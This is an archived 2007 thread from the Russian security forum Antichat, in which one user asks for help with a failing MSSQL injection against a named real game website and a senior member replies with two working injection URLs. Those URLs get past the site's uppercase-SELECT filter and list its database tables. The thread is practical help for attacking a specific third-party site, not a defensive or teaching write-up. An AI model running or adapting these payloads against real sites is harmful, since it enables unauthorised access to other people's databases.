ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Не выходит выполнить mssql запрос
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Не выходит выполнить mssql запрос
  #1  
Старый 09.09.2007, 00:51
mental2
Познающий
Регистрация: 13.08.2007
Сообщений: 37
Провел на форуме:
232729

Репутация: 1
По умолчанию Не выходит выполнить mssql запрос
Например вот так ht__tp://la2.spark-games.ru/la2info/?part=items&id=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.T ABLES)

При вставке TOP, всегда пишет message: Incorrect syntax near the keyword 'TOP'. (severity 15) in .....

Как можна узнать таблицы в такой трабле? Или же есть ли другой способ?
 

  #2  
Старый 09.09.2007, 01:15
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию
Цитата:
Сообщение от mental2  
Например вот так ht__tp://la2.spark-games.ru/la2info/?part=items&id=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.T ABLES)

При вставке TOP, всегда пишет message: Incorrect syntax near the keyword 'TOP'. (severity 15) in .....

Как можна узнать таблицы в такой трабле? Или же есть ли другой способ?
Вообще читай статью [cash]
 https://forum.antichat.ru/thread30501.html

Но в принципе у тебя здесь проблема в фильтрации SELECT, причем(что странно) только с буквами в верхнем регистре, поэтому в данном случае работает вот так:

Код:
http://la2.spark-games.ru/la2info/?part=items&id=(select+top+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
или так

Код:
http://la2.spark-games.ru/la2info/?part=items&id=-1+or+1=(select+top+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
что не принципиально в данном случае.
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Провидение Иньекций в MSSQL сервер от Microsoft. guest3297 Авторские статьи 102 06.04.2010 20:38
Посимвольный перебор в базах данных на примере MySQL LoFFi Чужие Статьи 5 30.04.2007 05:05
Коды состояния HTTP - Коды ошибок http сервера D=P=CH= MOD= *nix 6 15.10.2006 20:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ